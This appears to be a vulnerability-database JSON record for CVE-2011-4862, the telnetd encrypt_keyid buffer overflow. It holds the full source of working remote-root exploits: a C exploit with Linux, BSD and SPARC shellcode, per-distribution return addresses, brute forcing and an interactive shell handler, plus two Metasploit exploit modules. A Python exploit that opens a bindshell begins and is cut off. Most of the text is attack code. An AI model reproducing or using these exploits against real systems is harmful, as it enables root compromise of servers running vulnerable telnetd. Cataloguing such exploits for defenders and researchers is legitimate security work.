elog('A network issue has occurred', error: e)\n rescue Timeout::Error => e\n print_error(\"#{target_host}:#{rport} Timed out after #{to} seconds\")\n elog(\"#{target_host}:#{rport} Timed out after #{to} seconds\", error: e)\n rescue ::Exception => e\n print_error(\"#{target_host}:#{rport} Error: #{e} #{e.backtrace}\")\n elog(\"#{target_host}:#{rport} Error: #{e} #{e.backtrace}\", error: e)\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb"}], "exploitdb": [{"lastseen": "2016-02-02T09:28:42", "description": "Telnetd encrypt_keyid - Remote Root Function Pointer Overwrite. CVE-2011-4862. Remote exploit for linux platform", "published": "2011-12-26T00:00:00", "type": "exploitdb", "title": "Telnetd encrypt_keyid - Remote Root Function Pointer Overwrite", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-26T00:00:00", "id": "EDB-ID:18280", "href": "https://www.exploit-db.com/exploits/18280/", "sourceData": "/***************************************************************************\r\n * telnetd-encrypt_keyid.c\r\n *\r\n * Mon Dec 26 20:37:05 CET 2011\r\n * \r\n * Copyright 2011 Jaime Penalba Estebanez (NighterMan)\r\n * Copyright 2011 Gonzalo J. Carracedo (BatchDrake)\r\n * \r\n * nighterman@painsec.com - jpenalbae@gmail.com\r\n * BatchDrake@painsec.com - BatchDrake@gmail.com\r\n *\r\n * ______ __ ________\r\n * / __ / /_/ / _____/\r\n * / /_/ /______________\\ \\_____________\r\n * / ___ / __ / / __ / \\ \\/ _ \\/ __/\r\n * / / / /_/ / / / / /___/ / __/ /__\r\n * ____/__/____\\__,_/_/_/ /_/______/\\___/\\____/____\r\n *\r\n *\r\n ****************************************************************************/\r\n\r\n/*\r\n * \r\n * Usage:\r\n * \r\n * $ gcc exploit.c -o exploit\r\n * \r\n * $ ./exploit 127.0.0.1 23 1\r\n * [<] Succes reading intial server request 3 bytes\r\n * [>] Telnet initial encryption mode and IV sent\r\n * [<] Server response: 8 bytes read\r\n * [>] First payload to overwrite function pointer sent\r\n * [<] Server response: 6 bytes read\r\n * [>] Second payload to triger the function pointer\r\n * [*] got shell?\r\n * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)\r\n * \r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <sys/time.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n/*\r\n * Most of the inetd impletantions have a connection limit per second\r\n * so you must chage this if you start getting errors reading responses\r\n * - for 60 conex per min 900000\r\n * - for 40 conex per min 1500000\r\n * - for no limit 300000 should work\r\n */\r\n#define BRUTE_TOUT 300000\r\n\r\n\r\n\r\n#define MAXKEYLEN 64-1\r\n\r\nstruct key_info\r\n{\r\n unsigned char keyid[MAXKEYLEN];\r\n unsigned char keylen[4];\r\n unsigned char dir[4];\r\n unsigned char modep[4];\r\n unsigned char getcrypt[4];\r\n};\r\n\r\nstruct target_profile\r\n{\r\n uint32_t skip;\r\n const char *address;\r\n const char *desc;\r\n const char *shellcode;\r\n \r\n};\r\n\r\n\r\n/* Shellcode FreeBSD x86 */\r\nconst char s_bsd32[] =\r\n \"\\x31\\xc0\" // xor %eax,%eax\r\n \"\\x50\" // push %eax\r\n \"\\xb0\\x17\" // mov $0x17,%al\r\n \"\\x50\" // push %eax\r\n \"\\xcd\\x80\" // int $0x80\r\n \"\\x50\" // push %eax\r\n \"\\x68\\x6e\\x2f\\x73\\x68\" // push $0x68732f6e\r\n \"\\x68\\x2f\\x2f\\x62\\x69\" // push $0x69622f2f\r\n \"\\x89\\xe3\" // mov %esp,%ebx\r\n \"\\x50\" // push %eax\r\n \"\\x54\" // push %esp\r\n \"\\x53\" // push %ebx\r\n \"\\x50\" // push %eax\r\n \"\\xb0\\x3b\" // mov $0x3b,%al\r\n \"\\xcd\\x80\"; // int $0x80\r\n\r\n/* Shellcode Linux x86 */\r\nconst char s_linux32[] = \"\\x31\\xc9\\xf7\\xe1\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xb0\\x0b\\xcd\\x80\";\r\n\r\n\r\n/* Shellcode Linux sparc */\r\nconst char s_linuxsparc[] = \"\\x2d\\x0b\\xd8\\x9a\" /* sethi %hi(0x2f626800), %l6 */\r\n \"\\xac\\x15\\xa1\\x6e\" /* or %l6, 0x16e, %l6 */\r\n \"\\x2f\\x0b\\xdc\\xda\" /* sethi %hi(0x2f736800), %l7 */\r\n \"\\x90\\x0b\\x80\\x0e\" /* and %sp, %sp, %o0 */\r\n \"\\x92\\x03\\xa0\\x08\" /* add %sp, 0x08, %o1 */\r\n \"\\x94\\x22\\x80\\x0a\" /* sub %o2, %o2, %o2 */\r\n \"\\x9c\\x03\\xa0\\x10\" /* add %sp, 0x10, %sp */\r\n \"\\xec\\x3b\\xbf\\xf0\" /* std %l6, [ %sp + - 16 ] */\r\n \"\\xd0\\x23\\xbf\\xf8\" /* st %o0, [ %sp + - 8 ] */\r\n \"\\xc0\\x23\\xbf\\xfc\" /* clr [ %sp + -4 ] */\r\n \"\\x82\\x10\\x20\\x3b\" /* mov 0x3b, %g1 */\r\n \"\\x91\\xd0\\x20\\x10\"; /* ta 0x10 */\r\n\r\n\r\n\r\n/* Valid targets list */\r\nstruct target_profile targets[] =\r\n{\r\n {20, \"\\x00\\x80\\x05\\x08\", \"Generic Linux i386 bruteforce\", s_linux32},\r\n {20, \"\\x00\\x80\\x05\\x08\", \"Generic BSD i386 bruteforce\", s_bsd32}, \r\n {20, \"\\x23\\xcc\\x05\\x08\", \"Ubuntu GNU/Linux 10.04, Inetutils Server (i386)\", s_linux32},\r\n {20, \"\\x12\\xc9\\x05\\x08\", \"Ubuntu GNU/Linux 10.04, Heimdal Server (i386)\", s_linux32},\r\n {20, \"\\xef\\x56\\x06\\x08\", \"Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)\", s_linux32},\r\n {20, \"\\x56\\x9a\\x05\\x08\", \"Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)\", s_linux32},\r\n {1, \"\\x00\\x03\\xe7\\x94\", \"Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)\", s_linuxsparc},\r\n {3, \"\\x00\\x03\\x2e\\x0c\", \"Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)\", s_linuxsparc},\r\n {20, \"\\xa6\\xee\\x05\\x08\", \"FreeBSD 8.0 (i386)\", s_bsd32},\r\n {20, \"\\xa6\\xee\\x05\\x08\", \"FreeBSD 8.1 (i386)\", s_bsd32},\r\n {20, \"\\xed\\xee\\x05\\x08\", \"FreeBSD 8.2 (i386)\", s_bsd32},\r\n {20, \"\\x02\\xac\\x05\\x08\", \"NetBSD 5.1 (i386)\", s_bsd32},\r\n \r\n {0, NULL, NULL, NULL}\r\n};\r\n\r\n\r\n\r\n/* Telnet commands */\r\nstatic unsigned char tnet_init_enc[] = \r\n \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\"\r\n \"\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\";\r\n\r\nstatic unsigned char tnet_option_enc_keyid[] = \"\\xff\\xfa\\x26\\x07\";\r\n\r\nstatic unsigned char tnet_end_suboption[] = \"\\xff\\xf0\";\r\n\r\n\r\n/* Check if the shellcode worked, slightly simpler than shell (int) */\r\nstatic int\r\ncheckmagic (int fd)\r\n{\r\n char got[32];\r\n \r\n if (write (fd, \"echo pikachu\\n\", 13) < 0)\r\n return -1;\r\n \r\n if (read (fd, got, 32) <= 0)\r\n return -1;\r\n\r\n return -!strstr (got, \"pikachu\");\r\n}\r\n\r\n\r\n/*\r\n * shell(): semi-interactive shell hack\r\n */\r\nstatic void shell(int fd)\r\n{\r\n fd_set fds;\r\n char tmp[128];\r\n int n;\r\n \r\n /* check uid */\r\n write(fd, \"id\\n\", 3);\r\n \r\n /* semi-interactive shell */\r\n for (;;) {\r\n FD_ZERO(&fds);\r\n FD_SET(fd, &fds);\r\n FD_SET(0, &fds);\r\n \r\n if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {\r\n perror(\"select\");\r\n break;\r\n }\r\n \r\n /* read from fd and write to stdout */\r\n if (FD_ISSET(fd, &fds)) {\r\n if ((n = read(fd, tmp, sizeof(tmp))) < 0) {\r\n fprintf(stderr, \"Goodbye...\\n\");\r\n break;\r\n }\r\n if (write(1, tmp, n) < 0) {\r\n perror(\"write\");\r\n break;\r\n }\r\n }\r\n \r\n /* read from stdin and write to fd */\r\n if (FD_ISSET(0, &fds)) {\r\n if ((n = read(0, tmp, sizeof(tmp))) < 0) {\r\n perror(\"read\");\r\n break;\r\n }\r\n if (write(fd, tmp, n) < 0) {\r\n perror(\"write\");\r\n break;\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\nstatic int open_connection(in_addr_t dip, int dport)\r\n{\r\n int pconn;\r\n struct sockaddr_in cdata;\r\n struct timeval timeout;\r\n\r\n /* timeout.tv_sec = _opts.timeout; */\r\n timeout.tv_sec = 8;\r\n timeout.tv_usec = 0;\r\n\r\n /* Set socket options and create it */\r\n cdata.sin_addr.s_addr = dip;\r\n cdata.sin_port = htons(dport);\r\n cdata.sin_family = AF_INET;\r\n\r\n pconn = socket(AF_INET, SOCK_STREAM, 0);\r\n \r\n if( pconn < 0 )\r\n {\r\n printf(\"Socket error: %i\\n\", pconn);\r\n printf(\"Err message: %s\\n\", strerror(errno));\r\n return (-1);\r\n }\r\n\r\n /* Set socket timeout */\r\n if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,\r\n (void *)&timeout, sizeof(struct timeval)) != 0)\r\n perror(\"setsockopt SO_RCVTIMEO: \");\r\n \r\n /* Set socket options */\r\n if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,\r\n (void *)&timeout, sizeof(struct timeval)) != 0)\r\n perror(\"setsockopt SO_SNDTIMEO: \");\r\n \r\n\r\n /* Make connection */\r\n if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0)\r\n {\r\n close(pconn);\r\n return -1;\r\n }\r\n \r\n return pconn;\r\n}\r\n\r\n\r\n\r\nstatic void usage(char *arg)\r\n{\r\n int x = 0;\r\n \r\n printf(\" ______ __ ________ \\n\");\r\n printf(\" / __ / /_/ / _____/\\n\");\r\n printf(\" / /_/ /______________\\\\ \\\\_____________\\n\");\r\n printf(\" / ___ / __ / / __ / \\\\ \\\\/ _ \\\\/ __/\\n\");\r\n printf(\" / / / /_/ / / / / /___/ / __/ /__\\n\");\r\n printf(\" ____/__/____\\\\__,_/_/_/ /_/______/\\\\___/\\\\____/____\\n\");\r\n printf(\" ---------------- www.painsec.com ---------------\\n\\n\");\r\n printf(\"(c) NighterMan & BatchDrake 2011, almost 2012\\n\");\r\n printf(\"OH MY GOD WE ARE ALL ABOUT TO DIE\\n\\n\");\r\n printf(\"Available Targets:\\n\\n\");\r\n \r\n \r\n /* print tagets */\r\n while(targets[x].address != NULL) {\r\n printf(\" %2i: %s\\n\", x + 1, targets[x].desc);\r\n x++;\r\n }\r\n \r\n printf(\"\\n\");\r\n printf(\"Telnetd encrypt_keyid exploit\\n\");\r\n printf(\"Usage: %s [ip] [port] [target]\\n\\n\", arg);\r\n}\r\n\r\n\r\nint\r\nattack (const char *ip, unsigned int port,\r\n unsigned char *payload, unsigned int psize, int tryshell)\r\n{\r\n unsigned char readbuf[256];\r\n int ret;\r\n int conn;\r\n \r\n /* Open the connection */\r\n conn = open_connection(inet_addr(ip), port);\r\n if (conn == -1) {\r\n printf(\"Error connecting: %i\\n\", errno);\r\n return -1;\r\n }\r\n \r\n /* Read initial server request */\r\n ret = read(conn, readbuf, 256);\r\n \r\n if (ret <= 0)\r\n {\r\n printf (\"[!] Error receiving response: %s\\n\", \r\n ret ? strerror (errno) : \"empty response\");\r\n close (conn);\r\n return -1;\r\n }\r\n \r\n printf(\"[<] Succes reading intial server request %i bytes\\n\", ret);\r\n \r\n /* printf(\"ATTACH DEBUGGER & PRESS KEY TO CONITNUE\\n\"); */\r\n /* ret = getchar(); */\r\n \r\n /* Send encryption and IV */\r\n ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));\r\n if (ret != sizeof(tnet_init_enc)) {\r\n printf(\"Error sending init encryption: %i\\n\", ret);\r\n close (conn);\r\n return -1;\r\n }\r\n printf(\"[>] Telnet initial encryption mode and IV sent\\n\");\r\n \r\n /* Read response */\r\n if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN)\r\n {\r\n printf (\"[!] Timeout when receiving response\\n\");\r\n close (conn);\r\n return -1;\r\n }\r\n else\r\n printf(\"[<] Server response: %i bytes read\\n\", ret);\r\n \r\n /* Send the first payload with the overflow */\r\n ret = write(conn, payload, psize);\r\n if (ret != psize) {\r\n printf(\"Error sending payload first time\\n\");\r\n close (conn);\r\n return -1;\r\n }\r\n printf(\"[>] First payload to overwrite function pointer sent\\n\");\r\n \r\n /* Read Response */\r\n if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN)\r\n {\r\n printf (\"[!] Timeout when receiving response\\n\");\r\n close (conn);\r\n return -1;\r\n }\r\n else\r\n printf(\"[<] Server response: %i bytes read\\n\", ret);\r\n \r\n \r\n /* Send the payload again to tigger the function overwrite */\r\n ret = write(conn, payload, psize);\r\n if (ret != psize) {\r\n printf(\"Error sending payload second time\\n\");\r\n close (conn);\r\n return -1;\r\n }\r\n printf(\"[>] Second payload to triger the function pointer\\n\");\r\n \r\n if (tryshell)\r\n {\r\n /* Start the semi interactive shell */\r\n printf(\"[*] got shell?\\n\");\r\n shell(conn);\r\n \r\n ret = 0;\r\n }\r\n else\r\n {\r\n printf (\"[*] Does this work? \");\r\n \r\n /* Just check if it works */\r\n \r\n if (checkmagic (conn) == 0)\r\n {\r\n printf (\"YES!!!\\n\");\r\n printf (\"Add the Target address to the targets list & recomple!!!\\n\");\r\n ret = 0;\r\n }\r\n else\r\n {\r\n printf (\"nope :(\\n\");\r\n ret = -1;\r\n }\r\n }\r\n \r\n close (conn);\r\n \r\n return ret;\r\n}\r\n\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int offset = 0;\r\n int target;\r\n int i;\r\n unsigned int address;\r\n \r\n /* Payload Size */\r\n int psize = (sizeof(struct key_info) + \r\n sizeof(tnet_option_enc_keyid) + \r\n sizeof(tnet_end_suboption));\r\n \r\n struct key_info bad_struct;\r\n unsigned char payload[psize];\r\n \r\n if ( argc != 4) {\r\n usage(argv[0]);\r\n return -1;\r\n }\r\n \r\n /* Fill the structure */\r\n memset(&bad_struct, 0x90, sizeof(struct key_info));\r\n memcpy(bad_struct.keylen, \"DEAD\", 4);\r\n memcpy(bad_struct.dir, \"BEEF\", 4);\r\n \r\n target = atoi(argv[3]) - 1;\r\n /* Target selection */\r\n struct target_profile *t;\r\n t = &targets[target];\r\n printf(\"Target: %s\\n\\n\", t->desc);\r\n \r\n for (i = 0; !i || target < 2; i++)\r\n {\r\n offset = 0;\r\n memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));\r\n memcpy (&address, t->address, 4);\r\n \r\n address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));\r\n printf (\"[*] Target address: 0x%04x\\n\", address);\r\n \r\n memcpy(bad_struct.modep, &address, 4); /* Readable address */\r\n memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */\r\n \r\n /* Prepare the payload with the overflow */\r\n memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));\r\n offset += sizeof(tnet_option_enc_keyid);\r\n memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));\r\n offset += sizeof(bad_struct);\r\n memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));\r\n \r\n if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)\r\n break;\r\n \r\n usleep (BRUTE_TOUT);\r\n }\r\n \r\n return 0;\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18280/"}, {"lastseen": "2016-02-02T09:36:22", "description": "FreeBSD Telnet Service Encryption Key ID Buffer Overflow. CVE-2011-4862. Remote exploit for bsd platform", "published": "2012-01-14T00:00:00", "type": "exploitdb", "title": "FreeBSD Telnet Service Encryption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-14T00:00:00", "id": "EDB-ID:18369", "href": "https://www.exploit-db.com/exploits/18369/", "sourceData": "##\r\n# $Id: $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Telnet\r\n\tinclude Msf::Exploit::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',\r\n\t\t\t'Description' => %q{\t\r\n\t\t\t\t\tThis module exploits a buffer overflow in the encryption option handler of the\r\n\t\t\t\tFreeBSD telnet service.\r\n\t\t\t\t},\r\n\t\t\t'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-4862'],\r\n\t\t\t\t\t['OSVDB', '78020'],\r\n\t\t\t\t\t['BID', '51182'],\r\n\t\t\t\t\t['URL', 'http://www.exploit-db.com/exploits/18280/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => 'bsd',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 128,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n \r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t\t[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx \r\n\t\t\t\t\t[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx\r\n\t\t\t\t\t# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)\r\n\t\t\t\t\t[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return\r\n\t\t\t\t\t# Versions 5.2 and below do not support encyption\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 23 2011'))\r\n\tend\r\n\r\n\tdef exploit_target(t)\r\n\r\n\t\tconnect\r\n\t\tbanner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\r\n\t\tvprint_status(banner_sanitized)\r\n\r\n\t\tenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\"\r\n\t\tenc_keyid = \"\\xff\\xfa\\x26\\x07\"\r\n\t\tend_suboption = \"\\xff\\xf0\"\r\n\r\n\t\t# Telnet protocol requires 0xff to be escaped with another\r\n\t\tpenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\")\r\n\r\n\t\tkey_id = Rex::Text.rand_text_alphanumeric(400)\r\n\t\tkey_id[ 0, 2] = \"\\xeb\\x76\"\r\n\t\tkey_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\")\r\n\t\tkey_id[76, 4] = [ t['Ret'] ].pack(\"V\")\r\n\r\n\t\t# Some of these bytes can get mangled, jump over them\r\n\t\tkey_id[80,112] = Rex::Text.rand_text_alphanumeric(112)\r\n\r\n\t\t# Bounce to the real payload (avoid corruption)\r\n\t\tkey_id[120, 2] = \"\\xeb\\x46\"\r\n\r\n\t\t# The actual payload\r\n\t\tkey_id[192, penc.length] = penc\r\n\r\n\t\t# Create the Key ID command\r\n\t\tsploit = enc_keyid + key_id + end_suboption\r\n\r\n\t\t# Initiate encryption\r\n\t\tsock.put(enc_init)\r\n\r\n\t\t# Wait for a successful response\r\n\t\tloop do\r\n\t\t\tdata = sock.get_once(-1, 5) rescue nil\r\n\t\t\tif not data\r\n\t\t\t\traise RuntimeError, \"This system does not support encryption\"\r\n\t\t\tend\r\n\t\t\tbreak if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\r\n\t\tend\r\n\r\n\t\t# The first request smashes the pointer\r\n\t\tprint_status(\"Sending first payload\")\r\n\t\tsock.put(sploit)\r\n\r\n\t\t# Make sure the server replied to the first request\r\n\t\tdata = sock.get_once(-1, 5)\r\n\t\tunless data\r\n\t\t\tprint_status(\"Server did not respond to first payload\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Some delay between each request seems necessary in some cases\r\n\t\t::IO.select(nil, nil, nil, 0.5)\r\n\r\n\t\t# The second request results in the pointer being called\r\n\t\tprint_status(\"Sending second payload...\")\r\n\t\tsock.put(sploit)\r\n\r\n\t\thandler\r\n\r\n\t\t::IO.select(nil, nil, nil, 0.5)\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18369/"}, {"lastseen": "2016-02-02T09:36:14", "description": "Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow. CVE-2011-4862. Remote exploit for linux platform", "published": "2012-01-14T00:00:00", "type": "exploitdb", "title": "Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-14T00:00:00", "id": "EDB-ID:18368", "href": "https://www.exploit-db.com/exploits/18368/", "sourceData": "##\r\n# $Id: $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\t\r\n\tinclude Msf::Exploit::Remote::Telnet\r\n\tinclude Msf::Exploit::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',\r\n\t\t\t'Description' => %q{\t\r\n\t\t\t\t\tThis module exploits a buffer overflow in the encryption option handler of the\r\n\t\t\t\tLinux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions\r\n\t\t\t\tuse NetKit-derived telnet daemons, so this flaw only applies to a small subset of\r\n\t\t\t\tLinux systems running telnetd.\r\n\t\t\t\t},\r\n\t\t\t'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-4862'],\r\n\t\t\t\t\t['OSVDB', '78020'],\r\n\t\t\t\t\t['BID', '51182'],\r\n\t\t\t\t\t['URL', 'http://www.exploit-db.com/exploits/18280/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => 'linux',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 200,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n \r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t\t[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 23 2011'))\r\n\tend\r\n\r\n\tdef exploit_target(t)\r\n\r\n\t\tconnect\r\n\t\tbanner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\r\n\t\tprint_status(banner_sanitized) if datastore['VERBOSE']\r\n\r\n\t\tenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\"\r\n\t\tenc_keyid = \"\\xff\\xfa\\x26\\x07\"\r\n\t\tend_suboption = \"\\xff\\xf0\"\r\n\r\n\t\tpenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\")\r\n\t\t\r\n\t\tkey_id = Rex::Text.rand_text_alphanumeric(400)\r\n\r\n\t\tkey_id[ 0, 2] = \"\\xeb\\x76\"\r\n\t\tkey_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\")\r\n\t\tkey_id[76, 4] = [ t['Ret'] ].pack(\"V\")\r\n\r\n\t\t# Some of these bytes can get mangled, jump over them\r\n\t\tkey_id[80,40] = \"\\x41\" * 40\r\n\r\n\t\t# Insert the real payload\r\n\t\tkey_id[120, penc.length] = penc\r\n\r\n\t\t# Create the Key ID command\r\n\t\tsploit = enc_keyid + key_id + end_suboption\r\n\r\n\t\t# Initiate encryption\r\n\t\tsock.put(enc_init)\r\n\r\n\t\t# Wait for a successful response\r\n\t\tloop do\r\n\t\t\tdata = sock.get_once(-1, 5) rescue nil\r\n\t\t\tif not data\r\n\t\t\t\traise RuntimeError, \"This system does not support encryption\"\r\n\t\t\tend\r\n\t\t\tbreak if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\r\n\t\tend\r\n\r\n\t\t# The first request smashes the pointer\r\n\t\tprint_status(\"Sending first payload\")\r\n\t\tsock.put(sploit) \r\n\t\t\r\n\t\t# Make sure the server replied to the first request\r\n\t\tdata = sock.get_once(-1, 5)\r\n\t\tunless data\r\n\t\t\tprint_status(\"Server did not respond to first payload\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Some delay between each request seems necessary in some cases\r\n\t\t::IO.select(nil, nil, nil, 0.5)\r\n\r\n\t\t# The second request results in the pointer being called\r\n\t\tprint_status(\"Sending second payload...\")\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\r\n\t\t::IO.select(nil, nil, nil, 0.5)\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18368/"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:02", "description": "", "published": "2012-01-16T00:00:00", "type": "packetstorm", "title": "FreeBSD telnetd Remote Root ", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-16T00:00:00", "id": "PACKETSTORM:108694", "href": "https://packetstormsecurity.com/files/108694/FreeBSD-telnetd-Remote-Root.html", "sourceData": "`#!/usr/bin/env python \n# Checks/exploits CVE-2011-4862 (remote root in encryption supporting telnetd) in multiple FreeBSD versions. \n# Author: Knull of http://leethack.info \n# References: \n# Metasploit module, http://www.metasploit.com/modules/exploit/freebsd/telnet/telnet_encrypt_keyid \n# FreeBSD advisory, http://lists.freebsd.org/pipermail/freebsd-announce/2011-December/001398.html \n \nimport random, string, struct, socket, time, sys \n \ndef usage(): \n \nprint \"Usage: \" + sys.argv[0] + \" [Option] host\\n\\nOptions: \\n -c\\tcheck if telnetd is vulnerable and running as root (runs command `id` on host)\\n -e\\texploit host (opens a bindshell on port 4444)\\n\" \n \nif len(sys.argv) == 3: \nhost = sys.argv[2].rstrip() \nport = 23 \nif sys.argv[1] == '-c': \n# slightly modified version of metasploits bsd/x86/exec: \n# \n# bsd/x86/exec - 71 bytes \n# http://www.metasploit.com \n# Encoder: x86/shikata_ga_nai \n# AppendExit=false, CMD=id, PrependSetresuid=false, \n# PrependSetuid=false, VERBOSE=false, PrependSetreuid=false \nbuf = 